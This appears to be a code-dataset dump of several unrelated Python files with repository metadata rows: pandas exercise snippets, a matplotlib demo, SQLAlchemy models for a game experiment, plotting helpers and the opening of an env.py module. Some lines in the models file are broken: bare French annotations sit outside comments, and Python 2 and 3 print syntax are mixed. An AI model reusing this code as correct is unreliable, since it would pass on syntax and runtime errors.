# NOTE(review): this file is a collection of DataCamp exercise snippets;
# feature_names and row_vals below are pre-defined only in the exercise
# environment and do not exist in this script.
zipped_lists = zip(feature_names,row_vals)
# Create a dictionary: rs_dict
rs_dict = dict(zipped_lists)
# Print the dictionary
print(rs_dict)
# Define lists2dict()
def lists2dict(list1, list2):
    """Pair each key in *list1* with the value at the same position in
    *list2* and return the resulting dictionary."""
    return dict(zip(list1, list2))
# Call lists2dict: rs_fxn
rs_fxn = lists2dict(feature_names,row_vals)
# Print rs_fxn
print(rs_fxn)
# Import the pandas package
import pandas as pd
# Turn list of lists into list of dicts: list_of_dicts
list_of_dicts = [lists2dict(feature_names, sublist) for sublist in row_lists]
# Turn list of dicts into a DataFrame: df
df = pd.DataFrame(list_of_dicts)
# Print the head of the DataFrame
print(df.head())
# Open a connection to the file
# NOTE(review): the loop variable 'file' shadows a builtin name, and the
# snippet assumes world_dev_ind.csv exists in the working directory.
with open('world_dev_ind.csv') as file:
    # Skip the column names
    file.readline()
    # Initialize an empty dictionary: counts_dict
    counts_dict = {}
    # Process only the first 1000 rows
    for j in range(1000):
        # Split the current line into a list: line
        line = file.readline().split(',')
        # Get the value for the first column: first_col
        first_col = line[0]
        # If the column value is in the dict, increment its value
        if first_col in counts_dict.keys():
            counts_dict[first_col] += 1
        # Else, add to the dict and set value to 1
        else:
            counts_dict[first_col] = 1
# Print the resulting dictionary
print(counts_dict)
# Define read_large_file()
def read_large_file(file_object):
    """Generator that lazily yields *file_object* one line at a time.

    Memory use stays flat no matter how large the input is; iteration
    stops at end of file (readline() returning an empty string).
    """
    line = file_object.readline()
    while line:
        yield line
        line = file_object.readline()
# Open a connection to the file
with open('world_dev_ind.csv') as file:
    # Create a generator object for the file: gen_file
    gen_file = read_large_file(file)
    # Print the first three lines of the file
    # NOTE(review): raises StopIteration if the file has fewer than 3 lines.
    print(next(gen_file))
    print(next(gen_file))
    print(next(gen_file))
# Initialize an empty dictionary: counts_dict
counts_dict = {}
# Open a connection to the file
with open('world_dev_ind.csv') as file:
    # Iterate over the generator from read_large_file()
    for line in read_large_file(file):
        row = line.split(',')
        first_col = row[0]
        if first_col in counts_dict.keys():
            counts_dict[first_col] += 1
        else:
            counts_dict[first_col] = 1
# Print
print(counts_dict)
#Reading from chunksize
# Import the pandas package
import pandas as pd
# Initialize reader object: df_reader
# NOTE(review): requires ind_pop.csv / ind_pop_data.csv in the working dir.
df_reader = pd.read_csv('ind_pop.csv', chunksize=10)
# Print two chunks
print(next(df_reader))
print(next(df_reader))
# Initialize reader object: urb_pop_reader
urb_pop_reader = pd.read_csv('ind_pop_data.csv', chunksize=1000)
# Get the first DataFrame chunk: df_urb_pop
df_urb_pop = next(urb_pop_reader)
# Check out the head of the DataFrame
print(df_urb_pop.head())
# Check out specific country: df_pop_ceb
df_pop_ceb = df_urb_pop[df_urb_pop['CountryCode']=='CEB']
# Zip DataFrame columns of interest: pops
pops = zip(df_pop_ceb['Total Population'], df_pop_ceb['Urban population (% of total)'])
# Turn zip object into list: pops_list
pops_list = list(pops)
# Print pops_list
print(pops_list)
# Initialize reader object: urb_pop_reader
urb_pop_reader = pd.read_csv('ind_pop_data.csv', chunksize=1000)
# Get the first DataFrame chunk: df_urb_pop
df_urb_pop = next(urb_pop_reader)
# Check out specific country: df_pop_ceb
df_pop_ceb = df_urb_pop[df_urb_pop['CountryCode'] == 'CEB']
# Zip DataFrame columns of interest: pops
pops = zip(df_pop_ceb['Total Population'],
           df_pop_ceb['Urban population (% of total)'])
# Turn zip object into list: pops_list
pops_list = list(pops)
# Use list comprehension to create new DataFrame column 'Total Urban Population'
# NOTE(review): assigning into a slice of df_urb_pop triggers pandas'
# SettingWithCopy warning; a .copy() of the slice would silence it.
df_pop_ceb['Total Urban Population'] = [int((tup[0]*tup[1])/100) for tup in pops_list]
# Plot urban population data
df_pop_ceb.plot(kind='scatter', x='Year', y='Total Urban Population')
plt.show()
| [
"ytn.vj2@gmail.com"
] | ytn.vj2@gmail.com |
f3bb6fb019a485fe0bec264817b74915c0530643 | 7323b8039f47c0457ae90173c963549b7d1e6823 | /sandbox/src1/histdemo.py | a8514133c69af80b7c5f510d812d969b0da96add | [
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] | permissive | sniemi/SamPy | abce0fb941f011a3264a8d74c25b522d6732173d | e048756feca67197cf5f995afd7d75d8286e017b | refs/heads/master | 2020-05-27T18:04:27.156194 | 2018-12-13T21:19:55 | 2018-12-13T21:19:55 | 31,713,784 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 361 | py | from matplotlib import rcParams
from pylab import *

# Draw 10k IQ-like samples: mean 100, std dev 15.
mu, sigma = 100, 15
x = mu + sigma*randn(10000)

# the histogram of the data
# FIX: the 'normed' keyword was removed in matplotlib 3.1; 'density=True'
# is the replacement and normalises the histogram the same way.
n, bins, patches = hist(x, 100, density=True)

# add a 'best fit' line
# FIX: mlab.normpdf was removed from matplotlib; compute the Gaussian pdf
# explicitly from the same mu/sigma instead.
y = exp(-0.5 * ((bins - mu) / sigma) ** 2) / (sigma * sqrt(2 * pi))
l = plot(bins, y, 'r--', linewidth=2)

xlim(40, 160)
xlabel('Smarts')
ylabel('P')
title(r'$\rm{IQ:}\/ \mu=100,\/ \sigma=15$')
show()
| [
"niemi@stsci.edu"
] | niemi@stsci.edu |
f54ac71cf009afa94e7ef8de543512fa581e50d4 | 86999093f510e29d3a301a10115c5516bd41e2db | /eg/models_comment.py | 4e33b5e59a83a8a6d806385f9be770febc297ed0 | [] | no_license | samuelmartinsa/EG | 9dcb00a80bfd7ad1ec5e44567c385736f7576908 | 33ad4c7aa33d964a1b3133b9a6b178ffd1771717 | refs/heads/master | 2021-01-21T11:30:55.313976 | 2017-08-31T13:58:02 | 2017-08-31T13:58:02 | 102,003,676 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,978 | py |
import datetime
from sqlalchemy import Table, Column, Integer, String, DateTime, Boolean, Text, ForeignKey
from sqlalchemy.types import REAL
from sqlalchemy.orm import relationship, backref
from sqlalchemy.ext.declarative import declarative_base
from db import Base
from sqlalchemy.schema import ForeignKeyConstraint, Index, UniqueConstraint
from config import config
from db import db_session, init_db
# Add by coco
#from picgencol import picgencol
from fractale_new import fractale_new
import random
# added by sam
#TABLENAME = config.get('Database Parameters', 'table_name')
TABLE_GAME = config.get('Database Parameters', 'table_game')
TABLE_GAMESET = config.get('Database Parameters', 'table_gameset')
TABLE_PARTICIPANT = config.get('Database Parameters', 'table_participant')
TABLE_USER = config.get('Database Parameters', 'table_user')
TABLE_GAME_PARTICIPANT = config.get('Database Parameters', 'table_game_participant')
TABLE_GAMESET_PARTICIPANT = config.get('Database Parameters', 'table_gameset_participant')
TABLE_ROUND = config.get('Database Parameters', 'table_round')
TABLE_CHOICE = config.get('Database Parameters', 'table_choice')
TABLE_DECISION = config.get('Database Parameters', 'table_decision')
TABLE_QUESTIONNAIRE = config.get('Database Parameters', 'table_questionnaire')
TABLE_CODE = config.get('Database Parameters', 'table_code')
TABLE_IMAGE = config.get('Database Parameters', 'table_image') # Added by coco
CODE_VERSION = config.get('Task Parameters', 'code_version')
# association tables
gameset_participant_table = Table(TABLE_GAMESET_PARTICIPANT, Base.metadata,
Column('gamesetid', Integer, ForeignKey(TABLE_GAMESET+'.id',
use_alter=True, name='fk_gameset_part_game_id')),
Column('assignmentId', String(128), nullable=False),
Column('workerId', String(128), nullable=False) ,
ForeignKeyConstraint(['assignmentId','workerId'],
[TABLE_PARTICIPANT+'.assignmentId',
TABLE_PARTICIPANT+'.workerId'],
use_alter=True, name='fk_gameset_part_part_id',
onupdate="CASCADE", ondelete="CASCADE")
)
Index('idx_assignment_worker_gameset', gameset_participant_table.c.assignmentId, gameset_participant_table.c.workerId),
game_participant_table = Table(TABLE_GAME_PARTICIPANT, Base.metadata,
Column('gameid', Integer, ForeignKey(TABLE_GAME+'.id',
use_alter=True, name='fk_game_part_game_id')),
Column('assignmentId', String(128), nullable=False),
Column('workerId', String(128), nullable=False) ,
ForeignKeyConstraint(['assignmentId','workerId'],
[TABLE_PARTICIPANT+'.assignmentId',
TABLE_PARTICIPANT+'.workerId'],
use_alter=True, name='fk_game_part_part_id',
onupdate="CASCADE", ondelete="CASCADE")
)
Index('idx_assignment_worker', game_participant_table.c.assignmentId, game_participant_table.c.workerId),
class User(Base):
"""
Object representation of a participant in the database.
"""
__tablename__ = TABLE_USER
# Status codes
ALLOCATED = 1
CONSENTED = 2
ASSESSED = 3
INSTRUCTED = 4
id = Column(Integer, primary_key=True)
username = Column(String(128))
password = Column(String(128))
worker = relationship("Participant",backref="user",cascade="all,delete")
lastvisit = Column(DateTime, nullable=True)
sessionId = Column(String(128), nullable=True)
status = Column(Integer, default = 1)
datastring = Column(Text, nullable=True)
email = Column(Text, nullable=True)
ipaddress = Column(String(128), nullable=True)
note = Column(Text, nullable=True)
codes = relationship("Code",backref="user",cascade="all,delete")
def __init__(self):
pass
def __repr__( self ):
return "Subject(%s, %s, %r, %r, %s)" % (
self.assignmentId,
self.workerId,
self.cond,
self.status,
self.codeversion )
#Index('idx_worker_in_user', User.worker)
class Participant(Base):
"""
Object representation of a participant in the database.
"""
__tablename__ = TABLE_PARTICIPANT
# Status codes
ALLOCATED = 1
CONSENTED = 2
INSTRUCTED = 3
STARTED = 4
COMPLETED = 5
DEBRIEFED = 6
CREDITED = 7
QUITEARLY = 8
assignmentId =Column(String(128), primary_key=True)
workerId = Column(String(128), primary_key=True)
hitId = Column(String(128))
ipaddress = Column(String(128))
cond = Column(Integer)
counterbalance = Column(Integer)
codeversion = Column(String(128))
beginhit = Column(DateTime, nullable=True) heure dans waiting room
beginexp = Column(DateTime, nullable=True) heure debut gameset
endhit = Column(DateTime, nullable=True) heure fin gameset
status = Column(Integer, default = 1)
debriefed = Column(Boolean)
datastring = Column(Text, nullable=True)
userid = Column(Integer, ForeignKey(TABLE_USER+'.id',
use_alter=True, name='fk_participant_user_id',
onupdate="CASCADE", ondelete="CASCADE"))
# many to many Participant<->Game
games = relationship('Game',
secondary=game_participant_table,
backref="participants",cascade="all,delete")
gamesets = relationship('GameSet',
secondary=gameset_participant_table,
backref="participants",cascade="all,delete")
choices = relationship("Choice",backref="participant",cascade="all,delete")
def __init__(self, hitId, ipaddress, assignmentId, workerId, cond, counterbalance):
print "TABLE_PARTICIPANT"
self.hitId = hitId
self.ipaddress = ipaddress
self.assignmentId = assignmentId
self.workerId = workerId
self.cond = cond
self.counterbalance = counterbalance
self.status = 1
self.codeversion = CODE_VERSION
self.debriefed = False
self.beginhit = datetime.datetime.now()
def __repr__( self ):
return "Subject(%s, %s, %r, %r, %s)" % (
self.assignmentId,
self.workerId,
self.cond,
self.status,
self.codeversion )
#Index('idx_user_in_participant', Participant.userid),
# Added by Sam
class GameSet(Base):
"""
Object representation of a set of games in the database.
"""
__tablename__ = TABLE_GAMESET
UNUSED = 0
WAITING_FOR_PARTICIPANTS = 1
STARTED = 2
TERMINATED = 3
id = Column(Integer, primary_key=True)
status = Column(Integer, default = WAITING_FOR_PARTICIPANTS)
numExpectedParticipants = Column(Integer, default = 2)
numGames = Column(Integer, default = 10);
datastring = Column(Text, nullable=True)
# many to many Game<->Participant
#participants = relationship('Participant', secondary=Games_Participants, backref='games')
# one to many GameSet<->Game
games = relationship("Game",backref="gameset",cascade="all,delete")
def __init__(self):
pass
def __repr__( self ):
return "Subject(%s, %r, %r, %s)" % (
self.id,
self.status,
self.numExpectedParticipants,
self.numGames,
self.datastring )
def curGameNum(self):
return(len(self.games))
# Added by coco
class Image(Base):
    """
    Object representation of a stimulus image in the database.

    Images start FREE and are flipped to USED when a Game claims them.
    """
    __tablename__ = TABLE_IMAGE

    # Allocation states.
    FREE = 1
    USED = 2

    id = Column(Integer, primary_key=True)
    pic_name = Column(String(128), nullable=True)
    percent = Column(Integer, nullable=True)
    complexity = Column(Integer, nullable=True)
    color = Column(String(128), nullable=True)
    status = Column(Integer, default=FREE)
    gameid = Column(Integer, ForeignKey(TABLE_GAME+'.id',
        use_alter=True, name='fk_image_game_id',
        onupdate="CASCADE", ondelete="CASCADE"))

    def __init__(self, pic_name, percent, color, complexity):
        self.pic_name = pic_name
        self.percent = percent
        self.color = color
        self.complexity = complexity

    def __repr__(self):
        # BUG FIX: the old format string had 4 placeholders for 3 arguments
        # (TypeError), and it referenced self.datastring, which Image does
        # not define (AttributeError).  Show the picture name instead.
        return "Subject(%s, %r, %r)" % (
            self.id,
            self.status,
            self.pic_name)

# BUG FIX: dropped the stray trailing comma that turned this statement into
# a discarded 1-tuple (inconsistent with the other Index statements below).
Index('idx_game_in_image', Image.gameid)
class Game(Base):
    """
    Object representation of a game in the database.

    A game belongs to a GameSet, claims three Images on creation and owns
    its Rounds.
    """
    __tablename__ = TABLE_GAME

    # Lifecycle states.
    UNUSED = 0
    WAITING_FOR_PARTICIPANTS = 1
    STARTED = 2
    TERMINATED = 3

    id = Column(Integer, primary_key=True)
    num = Column(Integer, default=1)
    status = Column(Integer, default=WAITING_FOR_PARTICIPANTS)
    numExpectedParticipants = Column(Integer, default=0)
    numRounds = Column(Integer, default=3)
    datastring = Column(Text, nullable=True)
    gamesetid = Column(Integer, ForeignKey(TABLE_GAMESET+'.id',
        use_alter=True, name='fk_game_gameset_id',
        onupdate="CASCADE", ondelete="CASCADE"))
    # Added by coco: images claimed by this game.
    image = relationship("Image", backref="game", cascade="all,delete")
    # one to many Game<->Round
    rounds = relationship("Round", backref="game", cascade="all,delete")

    def __init__(self):
        # Added by coco: claim the first three FREE images for this game.
        # NOTE(review): if fewer than 3 FREE images exist, the game is
        # silently created with fewer images -- confirm that is intended.
        matches = Image.query.filter(Image.status == Image.FREE).all()
        for curimage in matches[0:3]:
            curimage.status = Image.USED
            self.image.append(curimage)
        db_session.commit()

    def __repr__(self):
        # BUG FIX: the old format string had 4 placeholders for 5 arguments,
        # which made repr() raise TypeError instead of returning a string.
        return "Subject(%s, %r, %r, %r, %s)" % (
            self.id,
            self.status,
            self.numExpectedParticipants,
            self.numRounds,
            self.datastring)

    def curRoundNum(self):
        # Number of rounds created so far in this game.
        return len(self.rounds)
class Round(Base):
    """
    Object representation of a round in the database.
    """
    __tablename__ = TABLE_ROUND

    # status
    UNUSED = 0
    STARTED = 1
    TERMINATED = 2
    # type
    LONE = 0
    SOCIAL = 1

    id = Column(Integer, primary_key=True)
    num = Column(Integer, default=1)
    status = Column(Integer, default=1)
    # NOTE: 'type' shadows the builtin inside this class body only.
    type = Column(Integer, default=LONE)
    datastring = Column(Text, nullable=True)
    startTime = Column(DateTime, nullable=True)
    maxreward = Column(REAL, nullable=True)
    gameid = Column(Integer, ForeignKey(TABLE_GAME+'.id',
        use_alter=True, name='fk_round_game_id',
        onupdate="CASCADE", ondelete="CASCADE"))
    choices = relationship("Choice", backref="round", cascade="all,delete")

    def __init__(self):
        pass

    def __repr__(self):
        # BUG FIX: the old format string had 4 placeholders for 3 arguments,
        # which made repr() raise TypeError instead of returning a string.
        return "Subject(%s, %r, %r)" % (
            self.id,
            self.status,
            self.datastring)

    def listOfChoices(self):
        """Return three lists of decision values for this round, one per
        decision slot (num == 0, 1, 2), gathered across every Choice
        recorded for the round."""
        res = []
        # One query per decision slot; previously three copy-pasted blocks.
        for slot in range(3):
            keytuples = (db_session.query(Decision.value)
                         .filter(Decision.num == slot)
                         .join(Choice.decisions)
                         .filter(Choice.roundid == self.id)
                         .join(Round)
                         .filter(Round.id == self.id)
                         .all())
            res.append([item[0] for item in keytuples])
        return res

Index('idx_game_in_round', Round.gameid)
class Choice(Base):
    """
    Object representation of a choice in the database.

    A choice belongs to a Round and to a Participant (composite FK on
    assignmentId/workerId) and owns three Decision rows.
    """
    __tablename__ = TABLE_CHOICE

    id = Column(Integer, primary_key=True)
    status = Column(Integer, default=1)
    # one to many Choice<->Decision
    decisions = relationship("Decision", backref="choice", cascade="all,delete")
    datastring = Column(Text, nullable=True)
    roundid = Column(Integer, ForeignKey(TABLE_ROUND+'.id',
        use_alter=True, name='fk_choice_round_id',
        onupdate="CASCADE", ondelete="CASCADE"))
    assignmentId = Column(String(128), nullable=False)
    workerId = Column(String(128), nullable=False)
    __table_args__ = (
        ForeignKeyConstraint(['assignmentId', 'workerId'],
                             [TABLE_PARTICIPANT+'.assignmentId',
                              TABLE_PARTICIPANT+'.workerId'],
                             name='fk_choice_part_id',
                             onupdate="CASCADE", ondelete="CASCADE"),
        UniqueConstraint('id')
        )

    def __init__(self):
        pass

    def __repr__(self):
        # BUG FIX: the old format string had 4 placeholders for 3 arguments,
        # which made repr() raise TypeError instead of returning a string.
        return "Subject(%s, %r, %r)" % (
            self.id,
            self.status,
            self.datastring)

    def listOfDecisions(self):
        """Return this choice's three decision values ordered by slot
        (Decision.num == 0, 1, 2)."""
        res = []
        # One query per decision slot; previously three copy-pasted blocks.
        for slot in range(3):
            key = (db_session.query(Decision.value)
                   .filter(Decision.num == slot)
                   .join(Choice.decisions)
                   .filter(Choice.id == self.id)
                   .one())
            res.append(key.value)
        print("Result from listOfDecisions")
        print("res Decisions")
        print(res)
        return res

Index('idx_round_in_choice', Choice.roundid)
Index('idx_assignment_worker_in_choice', Choice.assignmentId, Choice.workerId)
class Decision(Base):
    """
    Object representation of a decision in the database.
    """
    __tablename__ = TABLE_DECISION

    # Provenance of the value: entered by the user, or filled automatically.
    USER_MADE = 1
    AUTO = 2

    id = Column(Integer, primary_key=True)
    status = Column(Integer, default=USER_MADE)
    # Slot index of this decision within its Choice (0, 1 or 2).
    num = Column(Integer, nullable=True)
    value = Column(REAL, nullable=True)
    datastring = Column(Text, nullable=True)
    reward = Column(REAL, nullable=True)
    choiceid = Column(Integer, ForeignKey(TABLE_CHOICE+'.id',
        use_alter=True, name='fk_decision_choice_id',
        onupdate="CASCADE", ondelete="CASCADE"))

    def __init__(self):
        pass

    def __repr__(self):
        # BUG FIX: the old format string had 4 placeholders for 3 arguments,
        # which made repr() raise TypeError instead of returning a string.
        return "Subject(%s, %r, %r)" % (
            self.id,
            self.status,
            self.datastring)

Index('idx_choice_in_decision', Decision.choiceid)
class Code(Base):
    """
    Object representation of a user completion code (CrowdFlower) in the
    database.
    """
    __tablename__ = TABLE_CODE

    # Allocation states: FREE codes may still be handed out to a user.
    FREE = 0
    USED = 1

    id = Column(Integer, primary_key=True)
    status = Column(Integer, default=FREE)
    num = Column(Integer, nullable=True)
    value = Column(String(128), nullable=True)
    userid = Column(Integer, ForeignKey(TABLE_USER+'.id',
        use_alter=True, name='fk_code_user_id',
        onupdate="CASCADE", ondelete="CASCADE"))

    def __init__(self):
        pass

    def __repr__(self):
        # BUG FIX: the old format string had 4 placeholders for 3 arguments
        # (TypeError), and it referenced self.datastring, which Code does
        # not define (AttributeError).  Show the code's value instead.
        return "Subject(%s, %r, %r)" % (
            self.id,
            self.status,
            self.value)

Index('idx_user_in_code', Code.userid)
class Questionnaire(Base):
    """
    Object representation of a participant's post-experiment questionnaire.

    Stores the debrief answers, a set of personality self-ratings and
    basic demographics.
    """
    __tablename__ = TABLE_QUESTIONNAIRE
    id = Column(Integer, primary_key=True)
    status = Column(Integer, default = 1)
    # Owning user account; cascades with the user row.
    userid = Column(Integer, ForeignKey(TABLE_USER+'.id',
        use_alter=True, name='fk_questionnaire_user_id',
        onupdate="CASCADE", ondelete="CASCADE"))
    #gamesetid = Column(Integer, ForeignKey(TABLE_GAMESET+'.id',
    # use_alter=True, name='fk_questionnaire_gameset_id',
    # onupdate="CASCADE", ondelete="CASCADE"))
    # Plain integer instead of a foreign key (see commented-out constraint
    # above, and the commented-out index at the bottom of this block).
    gamesetid = Column(Integer, default = 0)
    aloneAnswer = Column(Boolean, default=True)
    #aloneQuestion = "Have you completed the game alone ?"
    communicate = Column(Boolean, default=True)
    #communicateQuestion = "Have you communicated with the other participant in any way druing the game ?"
    communicateDescription = Column(Text, default="")
    # Personality self-ratings (integer scale).  NOTE(review): these look
    # like Ten-Item Personality Inventory (TIPI) items -- confirm.
    extraverted = Column(Integer, default=0)
    critical = Column(Integer, default=0)
    dependable = Column(Integer, default=0)
    anxious = Column(Integer, default=0)
    # NOTE: 'open' shadows the builtin open() inside this class body only.
    open = Column(Integer, default=0)
    reserved = Column(Integer, default=0)
    sympathetic = Column(Integer, default=0)
    disorganized = Column(Integer, default=0)
    calm = Column(Integer, default=0)
    conventional = Column(Integer, default=0)
    # Demographics.
    sexe = Column(Integer, default=0)
    nativespeakenglish = Column(Integer, default=0)
    schoolgrade = Column(Integer, default=0)
    def __init__(self):
        pass
    def __repr__( self ):
        # NOTE(review): 'conventional' is the one rating not included in
        # this repr -- confirm whether the omission is intentional.
        return "Subject(%r, %r, %r, %r, %r, %r, %s, %r, %r, %r, %r, %r, %r, %r, %r, %r, %r, %r, %r)" % (
            self.id,
            self.status,
            self.userid,
            self.gamesetid,
            self.aloneAnswer,
            self.communicate,
            self.communicateDescription,
            self.extraverted,
            self.critical,
            self.dependable,
            self.anxious,
            self.open,
            self.reserved,
            self.sympathetic,
            self.disorganized,
            self.calm,
            self.sexe,
            self.nativespeakenglish,
            self.schoolgrade
            )
Index('idx_user_in_questionnaire', Questionnaire.userid)
#Index('idx_gameset_in_questionnaire', Questionnaire.gamesetid)
| [
"samuel.martinsa@gmail.com"
] | samuel.martinsa@gmail.com |
2475a91607980124875ab9ed113fb3f1a9d639cb | 5b3bc632a29c77d3388e9178fe583d6ae6993730 | /visuals.py | e30da2fab500bc81c37e9a879b84825ee8e28763 | [] | no_license | NagaHarish34/Liver-Disease | fb181d4fd4a125f5ce93129a2075face7df4052c | 2f66ca6289ba373d20319a114e3dd86f8ae5bb4b | refs/heads/master | 2020-04-26T18:19:28.110217 | 2019-03-04T12:35:36 | 2019-03-04T12:35:36 | 173,741,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,299 | py | ###########################################
# Suppress matplotlib user warnings
# Necessary for newer version of matplotlib
import warnings
warnings.filterwarnings("ignore", category = UserWarning, module = "matplotlib")
#
# Display inline matplotlib plots with IPython
# NOTE(review): get_ipython() returns None outside an IPython/Jupyter
# session, so importing this module from a plain interpreter fails on the
# line below -- this module appears to be notebook-only; confirm.
from IPython import get_ipython
get_ipython().run_line_magic('matplotlib', 'inline')
###########################################

import matplotlib.pyplot as pl
import matplotlib.patches as mpatches
import numpy as np
import pandas as pd
from time import time
# NOTE(review): mpatches, pd, time, f1_score and accuracy_score are unused
# in this file's visible code -- possibly kept for notebook convenience.
from sklearn.metrics import f1_score, accuracy_score
def distribution(data, transformed = False, features = ('capital-gain', 'capital-loss')):
    """
    Visualization code for displaying skewed distributions of features.

    Parameters:
        data: table-like object indexable by column name (e.g. a DataFrame).
        transformed: set True once the features have been log-transformed;
            only the figure title changes.
        features: the (two) continuous features to plot.  Generalized from
            the previously hard-coded census columns; the default keeps the
            old behavior.
    """
    # Create figure
    fig = pl.figure(figsize = (11,5))

    # Skewed feature plotting
    for i, feature in enumerate(features):
        ax = fig.add_subplot(1, 2, i+1)
        ax.hist(data[feature], bins = 25, color = '#00A0A0')
        ax.set_title("'%s' Feature Distribution"%(feature), fontsize = 14)
        ax.set_xlabel("Value")
        ax.set_ylabel("Number of Records")
        # Clip the y-axis so a dominant bin doesn't dwarf the rest; the top
        # tick is relabelled ">2000" to signal the clipping.
        ax.set_ylim((0, 2000))
        ax.set_yticks([0, 500, 1000, 1500, 2000])
        ax.set_yticklabels([0, 500, 1000, 1500, ">2000"])

    # Plot aesthetics
    if transformed:
        fig.suptitle("Log-transformed Distributions of Continuous Census Data Features", \
            fontsize = 16, y = 1.03)
    else:
        fig.suptitle("Skewed Distributions of Continuous Census Data Features", \
            fontsize = 16, y = 1.03)

    fig.tight_layout()
    fig.show()
def evaluate(results, accuracy, f1):
    """
    Visualization code to display results of various learners.

    inputs:
      - results: nested dict results[learner_name][i][metric], where i in
        {0, 1, 2} indexes the three training-set sizes (1%/10%/100%) and
        metric is one of 'train_time', 'acc_train', 'f_train', 'pred_time',
        'acc_test', 'f_test'
      - accuracy: The score for the naive predictor
      - f1: The score for the naive predictor
    """
    # Create figure: 2 rows x 4 columns; the 4th column is reserved for the
    # legend and is blanked out below.
    fig, ax = pl.subplots(2, 4, figsize = (11,7))

    # Constants
    # NOTE(review): only three colors are defined, so this supports at most
    # three learners -- confirm callers never pass more.
    bar_width = 0.3
    colors = ['#A00000','#00A0A0','#00A000']

    # Super loop to plot four panels of data
    # Metric j lands in panel (j//3, j%3); bars are grouped by training-set
    # size (i) and colored per learner (k).
    for k, learner in enumerate(results.keys()):
        for j, metric in enumerate(['train_time', 'acc_train', 'f_train', 'pred_time', 'acc_test', 'f_test']):
            for i in np.arange(3):

                # Creative plot code
                ax[j//3, j%3].bar(i+k*bar_width, results[learner][i][metric], width = bar_width, color = colors[k])
                ax[j//3, j%3].set_xticks([0.45, 1.45, 2.45])
                ax[j//3, j%3].set_xticklabels(["1%", "10%", "100%"])
                ax[j//3, j%3].set_xlabel("Training Set Size")
                ax[j//3, j%3].set_xlim((-0.1, 3.0))

    # Add unique y-labels
    ax[0, 0].set_ylabel("Time (in seconds)")
    ax[0, 1].set_ylabel("Accuracy Score")
    ax[0, 2].set_ylabel("F-score")
    ax[1, 0].set_ylabel("Time (in seconds)")
    ax[1, 1].set_ylabel("Accuracy Score")
    ax[1, 2].set_ylabel("F-score")

    # Add titles
    ax[0, 0].set_title("Model Training")
    ax[0, 1].set_title("Accuracy Score on Training Subset")
    ax[0, 2].set_title("F-score on Training Subset")
    ax[1, 0].set_title("Model Predicting")
    ax[1, 1].set_title("Accuracy Score on Testing Set")
    ax[1, 2].set_title("F-score on Testing Set")

    # Add horizontal lines for naive predictors
    ax[0, 1].axhline(y = accuracy, xmin = -0.1, xmax = 3.0, linewidth = 1, color = 'k', linestyle = 'dashed')
    ax[1, 1].axhline(y = accuracy, xmin = -0.1, xmax = 3.0, linewidth = 1, color = 'k', linestyle = 'dashed')
    ax[0, 2].axhline(y = f1, xmin = -0.1, xmax = 3.0, linewidth = 1, color = 'k', linestyle = 'dashed')
    ax[1, 2].axhline(y = f1, xmin = -0.1, xmax = 3.0, linewidth = 1, color = 'k', linestyle = 'dashed')

    # Set y-limits for score panels
    ax[0, 1].set_ylim((0, 1))
    ax[0, 2].set_ylim((0, 1))
    ax[1, 1].set_ylim((0, 1))
    ax[1, 2].set_ylim((0, 1))

    # Set additional plots invisibles
    ax[0, 3].set_visible(False)
    ax[1, 3].axis('off')

    # Create legend: draw zero-height bars on the current axes purely to
    # register one colored legend handle per learner.
    for i, learner in enumerate(results.keys()):
        pl.bar(0, 0, color=colors[i], label=learner)
    pl.legend()

    # Aesthetics
    pl.suptitle("Performance Metrics for Three Supervised Learning Models", fontsize = 16, y = 1.10)
    pl.tight_layout()
    pl.show()
def feature_plot(importances, X_train, y_train):
    """
    Plot the five most predictive features, their individual weights and
    the running cumulative weight.
    """
    # Rank features by importance (descending) and keep the top five.
    order = np.argsort(importances)[::-1]
    top_features = X_train.columns.values[order[:5]]
    weights = importances[order][:5]

    # Create the plot
    fig = pl.figure(figsize = (9,5))
    pl.title("Normalized Weights for First Five Most Predictive Features", fontsize = 16)
    positions = np.arange(5)
    pl.bar(positions, weights, width = 0.6, align="center", color = '#00A000', \
          label = "Feature Weight")
    pl.bar(positions - 0.3, np.cumsum(weights), width = 0.2, align = "center", color = '#00A0A0', \
          label = "Cumulative Feature Weight")
    pl.xticks(positions, top_features)
    pl.xlim((-0.5, 4.5))
    pl.ylabel("Weight", fontsize = 12)
    pl.xlabel("Feature", fontsize = 12)

    pl.legend(loc = 'upper center')
    pl.tight_layout()
    pl.show()
| [
"noreply@github.com"
] | noreply@github.com |
a7334361535cd4503b271c35bfd8534292921615 | 96d6c5c14f3917726d5695deddb368762d83a0f7 | /virtualenv/lib/python3.9/site-packages/env.py | 13f609ffd0e4643aaf06e93d406632fe1a97900d | [] | no_license | CyberFlameGO/PythonUtils | d4e9fdbe8c688d3507615a6ac52bdb6ebc2303df | dd04bd02d303fc369c8d4407ba1bcb6e4fa720ea | refs/heads/master | 2023-06-30T05:36:31.094658 | 2021-08-02T21:30:09 | 2021-08-02T21:30:09 | 383,275,512 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,223 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
env.py
Simplified access to environment variables in Python.
@copyright: 2018 by Mike Miller
@license: LGPL
'''
#
# The implementation below is odd at times due to using the module as a
# container.
#
import sys, os
try:
from collections.abc import MutableMapping
except ImportError:
from collections import MutableMapping # Py2
__version__ = '0.92'
class EnvironmentVariable(str):
    ''' Represents a variable entry in the environment.  Base class.

        Contains the functionality of strings plus a number of convenience
        properties for type conversion.  Not instantiated directly; use
        Entry or NullEntry.
    '''
    def __init__(self, *args):
        raise NotImplementedError('Use Entry() or NullEntry() instead.')


class Entry(EnvironmentVariable):
    ''' Represents an existing entry in the environment. '''

    def __new__(cls, name, value, sep=os.pathsep):
        # BUG FIX: __new__ must accept the same signature as __init__.
        # Previously it only took (name, value), so Entry(name, value,
        # sep=':') raised TypeError before __init__ ever ran.  The extra
        # argument is simply ignored here; only value becomes the string.
        return str.__new__(cls, value)  # Py2/3

    def __init__(self, name, value, sep=os.pathsep):
        self.name = name
        self.value = value
        self._pathsep = sep

    @property
    def truthy(self):
        ''' Convert a Boolean-like string value to a Boolean or None.

            Note: the rules are different than string type "truthiness."

                '0'                     --> False
                '1'                     --> True
                ('n', 'no', 'false')    --> False   # case-insensitive
                ('y', 'yes', 'true')    --> True    # case-insensitive
                else                    --> raise ValueError()

            An empty string returns None.
        '''
        lower = self.lower()
        result = None
        if lower.isdigit():
            result = bool(int(lower))
